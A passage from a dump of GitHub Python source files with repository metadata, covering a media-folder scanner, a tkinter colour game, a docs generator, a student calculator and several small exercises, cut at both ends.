remove(directory)#.replace(\".\", \" \"))\n serial = False\n series = []\n if serial:\n while path in k[i] and i < len(k) - 1:\n seria = k[i].replace(mult, '')[k[i].replace(mult, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(mult, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'directory': path,\n 'full_path': full_path})\n #print(seria)\n try:\n if path not in k[i + 1]:\n break\n except IndexError:\n break\n i += 1\n else:\n seria = k[i].replace(mult, '')[k[i].replace(mult, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(mult, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'directory': path,\n 'full_path': full_path})\n #print(seria)\n return name, series, path, i\n\n\ndef find_files(root_dir, ext):\n \"\"\"\n Поиск файлов с определенным расширением в папках\n :param root_dir: Корневая папка (с которой начинать поиск)\n :type root_dir: str\n :param ext: Расширения файлов\n :type ext: list\n :return: Список найденных файлов\n \"\"\"\n k = []\n for root, dirs, files in os.walk(root_dir, followlinks=True, onerror=file_error):\n for file in files:\n if file.endswith(tuple(ext)):\n k.append(os.path.join(root, file))\n return k\n\n\ndef file_error(*args, **kwargs):\n print(args[0])\n sys.exit()\n\n\ndef check_files_mkv_mult():\n \"\"\"\n Сканер папки на файлы mkv Мультики\n :return: список словарей с мультиками\n :type: dict\n \"\"\"\n k = find_files(scanpath, ['mkv', 'avi'])\n mult = os.path.join(scanpath, \"Мультики\") + (\"\\\\\" if os.name == \"nt\" else \"/\")\n i = 0\n while i < len(k):\n if mult in k[i]:\n name, series, path, i = find_series_mult(k, i, mult)\n mults.append({'name': name,\n 'directory': path,\n 'series': series,\n 'detail': ''})\n i += 1\n return mults\n\n\ndef mult_detail(mults):\n \"\"\"\n Поиск детальной информации по мультфильму на Shikimori и Kinopoisk\n :param mults: список словарей с мультфильмами\n :return: Обработанный словарь\n \"\"\"\n for mult in mults:\n mult['detail'] = parcer.find(params={'search': mult['name'].replace(' ', '+')})\n return mults\n\n\ndef find_subs_mult():\n \"\"\"\n Функция поиска субтитров к мультикам\n :return: список словарей сабов\n \"\"\"\n k = find_files(scanpath, ['.ass'])\n mult = scanpath + \"/Мультики/\"\n i = 0\n subs = []\n print(k[i])\n while i < len(k):\n if mult in k[i]:\n directory = k[i].replace(mult, '')\n if k[i].count('/') > scanpath.count('/') + 2:\n pathid = directory.find('/')\n subdir = directory[pathid + 1:directory.find('/', pathid + 1)]\n path = directory[0:pathid]\n if subdir.find(\"[\") == -1:\n autor = directory[directory.rfind(subdir):directory.rfind(\"/\")].replace(subdir + \"/\", \"\")\n print(autor)\n else:\n autor = subdir[subdir.find(\"[\") + 1:subdir.find(\"]\")]\n while path + \"/\" + subdir in k[i] and i < len(k):\n subid = k[i].rfind(\"/\")\n subtitle = k[i][subid + 1::]\n nameofsub = remove(subtitle.replace(\".ass\", \"\"))\n full_path = k[i].replace(mult + path, \"\")\n if len(autor) == 0:\n autor = \"Нету\"\n subs.append({'name': nameofsub,\n 'autor': autor,\n 'full_name': subtitle,\n 'directory': path,\n 'full_path': full_path})\n print(subtitle)\n if i + 1 < len(k):\n if path + \"/\" + subdir not in k[i + 1]:\n break\n else:\n break\n i += 1\n i += 1\n return subs\n\n\ndef find_audio_mult():\n \"\"\"\n Функция поиска озвучек к мультикам в форматах ac3 и mka\n :return: список словарей с озвучками\n \"\"\"\n audio = []\n # os.system(f\"find {scanpath} -name *.ass > subs.txt\")\n try:\n for root, dirs, files in os.walk(f\"{scanpath}/Мультики\"):\n for file in files:\n if file.endswith(\".mka\") or file.endswith(\".ac3\"):\n autor = root[root.rfind(\"/\")+1:]\n directory = root.replace(scanpath + \"/Мультики/\", \"\")\n audio.append({\"name\": remove(os.path.splitext(file)[0]),\n \"full_name\": file,\n \"autor\": autor,\n \"directory\": directory[:directory.rfind(\"/\")],\n \"full_path\": os.path.join(root, file).replace(scanpath+\"/Мультики/\", \"\")})\n return audio\n except FileNotFoundError as e:\n print(\"Нет такого файла или каталога:\", str(e)[str(e).find(\"'\"):str(e).rfind(\"'\")+1])\n\n\ndef export(mults, i):\n \"\"\"\n Экпортирует данные в базу данных\n :type mults: dict\n :param mults:\n :type i: bool\n :param i: Какой словарь? True - Мультфильмы, False - Фильмы\n :return:\n \"\"\"\n if len(mults) == 0:\n print(\"Экспортировать нечего\")\n sys.exit()\n else:\n if i:\n Database.export_mult(mults)\n else:\n Database.export_film(mults)\n\n\ndef prepare_to_export(path, film):\n \"\"\"\n Функция подготовки к экспорту\n :type path: str\n :param path: Строка пути к файлу\n :type film: str\n :param film: Строка пути к папке с фильмами/мультиками\n :return: Обрезанные имя файла, путь к файлу, Тип (Сериал или нет)\n \"\"\"\n directory = path.replace(film, '')\n if path.count('/') > scanpath.count('/') + 2:\n serial = True\n pathid = directory.find('/')\n path = directory[0:pathid]\n print(path)\n name = directory[0:pathid].replace(\"_\", \" \")\n name = name.replace(\".1.\", \".\")\n name = remove(name.replace(\".\", \" \"))\n else:\n path = directory\n name = directory.replace(\"_\", \" \")\n name = remove(name.replace(r'\\.(?=.*?\\.)', ''))\n serial = False\n return name, path, serial\n\n\ndef check_files_mkv_film():\n \"\"\"\n Сканирует папку на наличие фильмов и если это сериал делит по сериям\n :return: Словарь с фильмами\n \"\"\"\n k = find_files(scanpath, ['.mkv'])\n film = scanpath + \"/Фильмы/\"\n i = 0\n while i < len(k):\n if film in k[i]:\n name, path, serial = prepare_to_export(k[i], film)\n series = []\n if serial:\n while path in k[i]:\n seria = k[i].replace(film, '')[k[i].replace(film, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(film, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'full_path': full_path})\n print(seria)\n try:\n if path not in k[i + 1]:\n break\n except IndexError:\n break\n i += 1\n else:\n seria = k[i].replace(film, '')[k[i].replace(film, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(film, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'full_path': full_path})\n print(seria)\n films.append({'name': name,\n 'directory': path,\n 'series': series,\n 'detail': kinopoisk_parcer.tryKinopoisk(name)})\n i += 1\n return films\n\n\ndef find_new_mult(): # Делаем запрос к БД и ищем совпадения названий серий и папок с теми что есть\n \"\"\"\n Сканирует каталог на наличие Мультфильмов, затем делает запрос к БД. Если найденых файлов в базе нет -> добавляем\n :return: None\n \"\"\"\n series = Database.get_mults()\n mult = scanpath + \"/Мультики/\"\n k = find_files(mult, ['.mkv'])\n i = 0\n mm = []\n while i < len(k) and mult in k[i]:\n name, ser, path, i = find_series_mult(k, i, mult)\n mm.append({'name': name,\n 'series': ser,\n 'path': path})\n i += 1\n ser = [{}, ]\n for title_local in mm:\n for title_BD in series:\n if title_BD['title_name'] == title_local['path']:\n for ser_title_local in title_local['series']:\n if ser_title_local['full_name'] in [ser_title_BD[0] for ser_title_BD in title_BD['serie_name']]:\n pass\n else:\n print(ser_title_local['full_name'], \" --> \", \"НЕТУ\")\n ser.append({'name': ser_title_local['name'],\n 'full_name': ser_title_local['full_name']})\n Database.export_series(ser, title_BD['id'])\n series = Database.get_mults()\n break\n\n\ndef remove(k):\n \"\"\"\n Принимает на вход строку и удаляет из нее все запрещенное\n :type k: str\n :param k: Строка перед обрезкой\n :return: Строка после обрезки\n \"\"\"\n linest = (\"(\", \")\", \"[\", \"]\", \"{\", \"}\")\n k = k.replace(\".1.\", \".\")\n if k.endswith((\"mkv\", \"avi\")):\n k = os.path.splitext(k)[0]\n k = k.replace(\".\", \" \")\n else:\n k = k.replace(\".\", \" \").strip()\n k = k.replace(\"_\", \" \")\n restart = True\n if linest[0] in k or linest[3] in k:\n while restart:\n string = k[k.find(linest[0]):k.find(linest[1]) + 1]\n string2 = k[k.find(linest[2]):k.find(linest[3]) + 1]\n string3 = k[k.find(linest[4]):k.find(linest[5]) + 1]\n k = k.replace(string, \"\")\n k = k.replace(string2, \"\")\n k = k.replace(string3, \"\")\n k = k.strip()\n if k.find(linest[0]) == -1 and k.find(linest[3]) == -1:\n restart = False\n z = open(\"forbidden.txt\", \"r\")\n words = [line[:-1] for line in z]\n z.close()\n for word in words:\n # if word in k:\n # k = k.replace(word, \"\").strip()\n copyk = k.lower().split()\n for i, w in enumerate(copyk):\n if word.lower() == w:\n k = k.split()\n k = k[:i]\n copyk = copyk[:i]\n k = \" \".join(k)\n #k = \"\".join(k.split().pop(i))\n if len(k) == 0:\n break\n return k\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n if (\"--new\" in sys.argv or \"-n\" in sys.argv) and (\"--mults\" in sys.argv or \"-m\" in sys.argv):\n find_new_mult()\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--films\" in sys.argv or \"-f\" in sys.argv):\n Database.drop(films=True)\n export(check_files_mkv_film(), False)\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--mults\" in sys.argv or \"-m\" in sys.argv):\n Database.drop(mults=True)\n export(mult_detail(check_files_mkv_mult()), True)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--subs\" in sys.argv or \"-s\" in sys.argv):\n Database.drop(subs=True)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--audio\" in sys.argv or \"-a\" in sys.argv):\n Database.drop(audio=True)\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif \"--drop\" in sys.argv or \"-d\" in sys.argv:\n Database.drop(True, True, True, True)\n export(mult_detail(check_files_mkv_mult()), True)\n export(check_files_mkv_film(), False)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif \"--help\" in sys.argv or \"-h\" in sys.argv:\n print(\"-n, --new для поиска новых серий, c дополнительным параметром -m для мультиков, для фильмов -d -f\\n\"\n \"-d, --drop для сброса базы данных и нового сканирования\\n\"\n \"-h, --help для отображения помощи\")\n elif \"--new\" in sys.argv or \"-n\" in sys.argv:\n print(\"Необходим дополнительный параметр -m\")\n else:\n print(\"Ошибка в параметрах. Для вывода справки используйте параметр -h\")\n else:\n print(\"Необходим параметр\")\n","repo_name":"Howe251/site","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15434,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20691779073","text":"from tkinter import *\r\nimport time\r\nimport random\r\n\r\nclass draw:\r\n def __init__(self,x,y,w,h,color = \"white\"):\r\n self.__x = x\r\n self.__y = y\r\n self.__w = w\r\n self.__h = h\r\n self.__id = canvas.create_rectangle(self.__x,self.__y,self.__x+self.__w,self.__y+self.__h,fill=color)\r\n \r\n def setdraw(self,x,y,w,h,color = \"white\"):\r\n self.destroy\r\n self.__x = x\r\n self.__y = y\r\n self.__w = w\r\n self.__h = h \r\n self.__id = canvas.create_rectangle(self.__x,self.__y,self.__x+self.__w,self.__y+self.__h,fill=color)\r\n \r\n def getdraw(self):\r\n return (self.__x,self.__y,self.__w,self.__h)\r\n \r\n def getid(self):\r\n return self.__id\r\n \r\n def destroy(self):\r\n canvas.delete(self.__id)\r\n \r\n \r\ndef destory():\r\n for i in range(0,len(obj)):\r\n obj[i].destroy()\r\n del obj[:]\r\n\r\n\r\ndef setting_class(n_by_n,color):\r\n global land_set\r\n land_set = random.randrange(0,n_by_n**2)\r\n side_length=(800-10*(n_by_n-1))/n_by_n\r\n for i in range(0,n_by_n**2):\r\n if i != land_set:\r\n obj.append(draw(100+(side_length+10)*(i//n_by_n),100+(side_length+10)*(i%n_by_n),side_length,side_length,color[0]))\r\n else:\r\n obj.append(draw(100+(side_length+10)*(i//n_by_n),100+(side_length+10)*(i%n_by_n),side_length,side_length,color[1]))\r\n \r\ndef mouseclick_left(event):\r\n global count,score,score_text,wrong\r\n for i in range(len(obj)):\r\n if event.x > canvas.coords(obj[i].getid())[0] and event.y > canvas.coords(obj[i].getid())[1] and event.x < canvas.coords(obj[i].getid())[2] and event.y < canvas.coords(obj[i].getid())[3]:\r\n if i == land_set:\r\n count = 5\r\n score += 1\r\n destory()\r\n color=set_color(score)\r\n setting_class(score//10+2,color)\r\n break\r\n else:\r\n wrong = 1\r\n break\r\n\r\ndef mouseclick_right(event):\r\n global count,score,wrong\r\n if count<=0 or score>=40 or wrong == 1:\r\n canvas.delete(end_text)\r\n score = 0\r\n count = 5\r\n wrong = 0\r\n color=set_color(score)\r\n setting_class(score//10+2,color)\r\n \r\ndef press_key(event):\r\n key_set.add(event.keysym)\r\n \r\ndef Release_key(event):\r\n key_set.remove(event.keysym)\r\n \r\ndef set_color(score):\r\n plus_minus=(-1)**random.randrange(1)\r\n if score<=30:\r\n offset=plus_minus*(190-5*score)\r\n else:\r\n offset=plus_minus*(70-score)\r\n main_r=random.randrange(0,256)\r\n main_g=random.randrange(0,256)\r\n main_b=random.randrange(0,256)\r\n main_rgb=[main_r,main_g,main_b]\r\n point_rgb=[main_r,main_g,main_b]\r\n main_color='#%02x%02x%02x'%(main_r,main_g,main_b)\r\n change_parameter=random.randrange(0,3)\r\n who_is_changed=random.sample(range(0,3),change_parameter+1)\r\n for i in who_is_changed:\r\n point_rgb[i]=main_rgb[i]+offset\r\n if point_rgb[i]>255:\r\n point_rgb[i]=point_rgb[i]-255\r\n elif point_rgb[i]<0:\r\n point_rgb[i]=point_rgb[i]+255\r\n point_color='#%02x%02x%02x'%(point_rgb[0],point_rgb[1],point_rgb[2]) \r\n return [main_color,point_color]\r\n \r\n\r\n#Game Window\r\ngame = Tk()\r\ngame.title(\"PALLET\")\r\nwidth=1000\r\nheigh=1000\r\ncanvas = Canvas(game,width=width,heigh=heigh,bg=\"black\")\r\ncanvas.pack()\r\ncanvas.bind(\"\",mouseclick_left)\r\ncanvas.bind(\"\",mouseclick_right)\r\ncanvas.bind_all(\"\",press_key)\r\ncanvas.bind_all(\"\",Release_key)\r\nobj = []\r\nkey_set = set()\r\n\r\ncanvas.create_text(500, 350, text =\"색감 테스트 게임입니다\\n다른 색깔 하나를 찾아 클릭하세요 \", fill = \"white\", font = (\"맑은 고딕\", 30))\r\ncanvas.create_text(500, 700, text =\"시작하려면 아무키나 누르세요\", fill = \"red\", font = (\"맑은 고딕\", 30))\r\nwhile(True): \r\n if key_set :\r\n canvas.delete(\"all\") \r\n break\r\n game.update() \r\n time.sleep(0.01)\r\n\r\nland_set = 0\r\nscore = 0\r\ncount = 5\r\nwrong = 0\r\ndraw(5,5,55,55)\r\ncolor=set_color(score)\r\ncount_text = canvas.create_text(30,30,text = int(count),fill=\"black\",font=(\"맑은 고딕\",30))\r\nscore_text = canvas.create_text(870,50,text = 'SCORE : %d'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\nend_text = 0\r\nsetting_class(score//10+2,color)\r\n\r\nwhile(True):\r\n canvas.delete(score_text)\r\n if count<=0:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = '제한시간이 경과하였습니다.\\n당신의 점수는 %d점 입니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n elif score>=40:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = \"흠 잡을 것도 없습니다!\\n당신은 완벽히 모든 색상을 구분하셨습니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.\",fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n elif wrong == 1:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = \"당신의 점수는 %d점입니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.\"%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n else:\r\n count = count -0.01\r\n canvas.delete(count_text)\r\n count_text = canvas.create_text(30,30,text = int(count),fill=\"black\",font=(\"맑은 고딕\",30))\r\n score_text = canvas.create_text(870,50,text = 'SCORE : %d'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n game.update()\r\n time.sleep(0.01)\r\n \r\n ","repo_name":"thithin-ent/game_python","sub_path":"game_bugfix.py","file_name":"game_bugfix.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23801023472","text":"import os\nfrom pathlib import Path\n\nimport keras_autodoc\nimport tutobooks\n\nPAGES = {\n \"AutoML_for_NeuralNetworks.md\": [\n \"ai2business.ai_engines.automl_neural_network.AutoMLModels\",\n ],\n \"Key_Performance_Collection.md\": [\n \"ai2business.kpi_collector.trends_collector.TrendsCollector\",\n \"ai2business.kpi_collector.finance_collector.FinanceCollector\",\n ],\n \"Sample_Generators.md\": [\"ai2business.datasets.sample_generator.SampleGenerators\"],\n \"Oneliner.md\": [\"ai2business.macros.oneliner.TrendSearch\"],\n}\n\n\naliases_needed = [\n \"tensorflow.keras.callbacks.Callback\",\n \"tensorflow.keras.losses.Loss\",\n \"tensorflow.keras.metrics.Metric\",\n \"tensorflow.data.Dataset\",\n]\n\n\nROOT = \"https://ai2business.github.io/ai2business/\"\n\nai2business_dir = Path(__file__).resolve().parents[1]\n\n\ndef py_to_nb_md(dest_dir, dir_path=\"tutorials\"):\n for file_path in os.listdir(f\"{dir_path}/\"):\n\n file_name = file_path\n py_path = os.path.join(dir_path, file_path)\n file_name_no_ext = os.path.splitext(file_name)[0]\n ext = os.path.splitext(file_name)[1]\n\n if ext != \".py\":\n continue\n\n nb_path = os.path.join(\"ipynb\", file_name_no_ext + \".ipynb\")\n md_path = os.path.join(dest_dir, \"tutorials\", file_name_no_ext + \".md\")\n\n Path(nb_path).parent.mkdir(exist_ok=True)\n Path(md_path).parent.mkdir(exist_ok=True)\n\n tutobooks.py_to_nb(py_path, nb_path, fill_outputs=True)\n tutobooks.py_to_md(py_path, nb_path, md_path, \"templates/img\")\n github_repo_dir = \"ai2business/ai2business/blob/main/docs/\"\n with open(md_path, \"r\") as md_file:\n button_lines = [\n # \":material-link: \"\n \"[**View in Colab**](https://colab.research.google.com/github/\"\n + github_repo_dir\n + \"ipynb/\"\n + file_name_no_ext\n + \".ipynb\"\n + \")    \"\n # + ''\n # + \":octicons-octoface-16: \"\n \"[**GitHub source**](https://github.com/\"\n + github_repo_dir\n + \"tutorials/\"\n + file_name_no_ext\n + \".py)\",\n \"\\n\",\n ]\n md_content = \"\".join(button_lines) + \"\\n\" + md_file.read()\n\n with open(md_path, \"w+\") as md_file:\n md_file.write(md_content)\n\n\ndef generate(dest_dir):\n api_dir = ai2business_dir / \"docs\" / \"api\"\n template_dir = ai2business_dir / \"docs\" / \"templates\"\n doc_generator = keras_autodoc.DocumentationGenerator(\n PAGES,\n \"https://github.com/ai2business/ai2business/blob/main\",\n api_dir,\n template_dir,\n # ai2business_dir / 'examples',\n extra_aliases=aliases_needed,\n )\n doc_generator.generate(dest_dir)\n readme = (ai2business_dir / \"README.md\").read_text()\n index = (template_dir / \"index.md\").read_text()\n index = index.replace(\"{{autogenerated}}\", readme[readme.find(\"##\") :])\n (dest_dir / \"index.md\").write_text(index, encoding=\"utf-8\")\n py_to_nb_md(dest_dir)\n\n\nif __name__ == \"__main__\":\n generate(ai2business_dir / \"docs\" / \"sources\")\n","repo_name":"SimonBOai/ai2business","sub_path":"docs/autogen.py","file_name":"autogen.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16592471763","text":"#!/bin/python3\n\nfrom berkas import *\nfrom cpi import *\n\ndata_path = \"data.json\"\ntren_path = \"tren.json\"\n\ntren = trenFromJson(tren_path)\ndata = dataFromJson(data_path)\n\nif isValidData(data) and isValidTren(tren):\n\tprint(\"Data\")\n\tm = matriksData(data, tren)\n\tcetakMatriks(m)\n\tprint(\"\\nMinimum\")\n\tminim = genMinimum(m)\n\tcetakMatriks(minim)\n\tprint(\"\\nMatriks Perhitungan\")\n\thitung = genHitung(tren, minim, m)\n\tcetakMatriks(hitung)\n\tprint(\"\\nMatriks Skor Perhitungan\")\n\tskor = genSkor(hitung)\n\tcetakMatriks(skor)\n\tprint(\"\\nHasil\")\n\tfor v in genResult(skor, data, tren):\n\t\tprint(\"\" + str(v['res']) + \" = \" + str(v['nama']))\nelse:print(\"Error\")\n\n","repo_name":"AchmadRifai/pySpk","sub_path":"cpi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37447377330","text":"from ..svgd.mp_svgd import MP_SVGD\nfrom .svn import SVN\n\n\nclass MP_SVN(SVN, MP_SVGD):\n\n def __init__(\n self,\n kernel_base_type='RBF',\n kernel_structure=None,\n verbose=False,\n control_dim=None,\n repulsive_scaling=1,\n **kernel_params,\n ):\n\n super().__init__(\n kernel_base_type,\n kernel_structure,\n verbose,\n control_dim,\n repulsive_scaling,\n **kernel_params,\n )\n\n def get_second_variation(\n self,\n k_XX,\n dk_dk_t,\n Hess,\n ):\n \"\"\"\n\n Parameters\n ----------\n k_XX : tensor\n Kernel Grammian. Shape: [num_particles, num_particles, dim]\n dk_dk_t : tensor\n Outer products of kernel gradients.\n Shape: [num_particles, num_particles, dim, dim]\n Hess : tensor\n Hessian of log_prob.\n Shape: [num_particles, dim, dim]\n\n Returns\n -------\n H : tensor\n Second variation. Shape [num_particles, dim, dim].\n \"\"\"\n k_sq = (k_XX ** 2).unsqueeze(-1) # b x b x d x 1\n H_ii = - Hess * k_sq + dk_dk_t\n H = H_ii.mean(dim=1)\n return H\n\n def get_svgd_terms(\n self,\n X,\n dlog_p,\n M=None,\n ):\n\n # Use message-passing format\n return MP_SVGD.get_svgd_terms(\n self, X, dlog_p, M,\n )\n","repo_name":"sashalambert/stein_lib","sub_path":"stein_lib/svn/mp_svn.py","file_name":"mp_svn.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"39951374766","text":"# addition function\r\ndef add(ar1):\r\n res = 0\r\n for i in range(len(ar1)):\r\n res += ar1[i]\r\n return res\r\n\r\n\r\n# subtraction function\r\ndef sub(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res -= ar1[i]\r\n return res\r\n\r\n\r\n# multiplication function\r\ndef multi(ar1):\r\n res = 1\r\n for i in range(len(ar1)):\r\n res *= ar1[i]\r\n return res\r\n\r\n\r\n# division function\r\ndef div(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res /= ar1[i]\r\n return res\r\n\r\n\r\n# exponential function\r\ndef exp(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res **= ar1[i]\r\n return res\r\n\r\n\r\n# modulus function\r\ndef mod(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res %= ar1[i]\r\n return res\r\n\r\n\r\n# hcf function\r\ndef hcf(ar1):\r\n flag = 0\r\n maximum = (max(ar1)) + 1\r\n maxi = []\r\n for i in range(1, maximum):\r\n for k in range(len(ar1)):\r\n if ar1[k] % i != 0:\r\n flag = 0\r\n break\r\n else:\r\n flag = 1\r\n continue\r\n if flag == 1:\r\n maxi.append(i)\r\n maximum = max(maxi)\r\n return maximum\r\n\r\n\r\n# lcm function\r\ndef lcm(ar1):\r\n boolea = False\r\n prod = 1\r\n n = 2\r\n while not boolea:\r\n abc = 0\r\n flag = 0\r\n for k in range(len(ar1)):\r\n if ar1[k] % n == 0:\r\n ar1[k] = ar1[k] / n\r\n abc = 0\r\n else:\r\n abc += 1\r\n # prod *= n\r\n if abc != len(ar1):\r\n prod *= n\r\n if abc == len(ar1):\r\n n += 1\r\n else:\r\n n = 2\r\n for k in range(len(ar1)):\r\n if ar1[k] == 1:\r\n flag += 1\r\n else:\r\n flag = 0\r\n if flag == len(ar1):\r\n boolea = True\r\n else:\r\n boolea = False\r\n return prod\r\n\r\n\r\n# user_input to the list\r\ndef user_input(ar1):\r\n user_stop = \" \"\r\n while user_stop != \"STOP\":\r\n print(\"Enter your number or write stop to terminate\")\r\n n = input()\r\n print()\r\n if n.isdigit():\r\n n = int(n)\r\n ar.append(n)\r\n continue\r\n else:\r\n if n.isalpha():\r\n user_stop = n.upper()\r\n if user_stop != \"STOP\":\r\n print(\"Check your input\")\r\n continue\r\n return ar1\r\n\r\n\r\nprint(\"*********************************Simple Calculator*********************************\")\r\nprint(\"You will be allowed to enter any number of input of numbers at a time until you write STOP \")\r\nar = []\r\nuser_string, again, user_exp, result = \" \", 1, 1, 1\r\n\r\n# operation choice\r\nwhile again == 1:\r\n print(\"Press 1 for Addition\")\r\n print(\"Press 2 for Subtraction\")\r\n print(\"Press 3 for Multiplication\")\r\n print(\"Press 4 for Division\")\r\n print(\"Press 5 for Exponentiation\")\r\n print(\"Press 6 for Modulus\")\r\n print(\"Press 7 for Highest Common Factor\")\r\n print(\"Press 9 for Mixed Expression\")\r\n print(\"Press 10 to Exit\")\r\n print(\"Enter your choice --> \")\r\n user_choice = int(input())\r\n # addition\r\n if user_choice == 1:\r\n user_input(ar)\r\n result = add(ar)\r\n print(\"Your result is \", result)\r\n\r\n # subtraction\r\n elif user_choice == 2:\r\n user_input(ar)\r\n result = sub(ar)\r\n print(\"Your result is \", result)\r\n\r\n # multiplication\r\n elif user_choice == 3:\r\n user_input(ar)\r\n result = multi(ar)\r\n print(\"Your result is \", result)\r\n\r\n # division\r\n elif user_choice == 4:\r\n user_input(ar)\r\n result = div(ar)\r\n print(\"Your result is \", result)\r\n\r\n # exponentiation\r\n elif user_choice == 5:\r\n user_input(ar)\r\n result = exp(ar)\r\n print(\"Your result is \", result)\r\n\r\n # modulus\r\n elif user_choice == 6:\r\n user_input(ar)\r\n result = mod(ar)\r\n print(\"Your result is \", result)\r\n\r\n # highest common factor\r\n elif user_choice == 7:\r\n user_input(ar)\r\n result = hcf(ar)\r\n print(\"Your result is \", result)\r\n\r\n # least common multiple\r\n elif user_choice == 8:\r\n user_input(ar)\r\n result = lcm(ar)\r\n print(\"Your result is \", result)\r\n\r\n # mixed expression\r\n elif user_choice == 9:\r\n print(\r\n \"Note: You are allowed to enter only one expression containing more than 2 operands and more than 2 \"\r\n \"different operators among those given below only.\\n \"\r\n \"Type '+' for addition\\n\"\r\n \"Type '-' for subtraction\\n\"\r\n \"Type '*' for multiplication\\n\"\r\n \"Type '/' for division\\n\"\r\n \"Type '**' for exponent\\n\"\r\n \"Type '%' for modulus\\n\")\r\n print(\"Enter your mathematical expression, following the rules given above\")\r\n expression = str(input())\r\n expression = expression.strip()\r\n for j in range(0, len(expression) + 1, 2):\r\n if not expression[j].isdigit():\r\n print(\"Please check your expression and try again\")\r\n break\r\n for j in range(1, len(expression), 2):\r\n # print(j)\r\n if expression[j] != \"+\" and expression[j] != \"-\" and expression[j] != \"*\" and expression[j] != \"/\" and \\\r\n expression[j] != \"**\" and expression[j] != \"%\":\r\n print(\"Please rectify your operator placements and try again\")\r\n break\r\n result = eval(expression)\r\n print(\"Your result is \", result)\r\n break\r\n\r\n # exit\r\n elif user_choice == 10:\r\n print(\"Program has terminated successfully\")\r\n else:\r\n print(\"Wrong Input\")\r\n\r\n print(\"\\n\\nPress 1 to rerun the program again.\")\r\n print(\"Press any number to terminate completely.\\n\")\r\n print(\"Enter your choice.\")\r\n again = int(input())\r\n\r\n # complete termination part\r\n if again != 1:\r\n quit()\r\n # rerun part\r\n else:\r\n print(\"Press 1 to rerun the program from the starting.\")\r\n print(\"Press any number to rerun the program with the result displayed.\")\r\n print(\"Enter your choice\")\r\n program_again = int(input())\r\n\r\n if program_again == 1: # rerun without the result\r\n again = 1\r\n continue\r\n else: # rerun with the result\r\n ar.clear()\r\n ar.append(result)\r\n again = 1\r\n continue\r\n","repo_name":"Riju-Saha/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9419140302","text":"\"\"\"\nWykorzystaj plik zawierający fragment Pana Tadeusza. Znajdź najdłuższe słowo występujące w za\u0002danym fragmencie\n\"\"\"\n\n\ndef load_content():\n with open('pan_tadeusz.txt', encoding='utf-8') as f:\n text_from_file = f.read()\n return text_from_file\n\n\ndef clean_txt(text):\n sig = '.,()!'\n for i in sig:\n text = text.replace(i, '')\n return text\n\n\ndef find_max(text):\n max_len = 0\n text = text.split()\n for index in range(len(text)):\n if len(text[index]) > max_len:\n max_len = index\n return text[max_len]\n\n\n#main\ncontent = load_content()\ncontent = clean_txt(content)\nprint(\"\\nMax word in the file:\", find_max(content))\n","repo_name":"gekogit/pythonCourse","sub_path":"07-files/05 max sentence.py","file_name":"05 max sentence.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22062758915","text":"import factory\nfrom django.utils import timezone\nfrom factory import fuzzy\n\nfrom .models import CheckIn, Unit\n\n\nclass UserFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = \"users.User\"\n\n username = factory.Faker(\"user_name\")\n email = factory.Faker(\"email\")\n password = factory.Faker(\"password\")\n\n\nclass 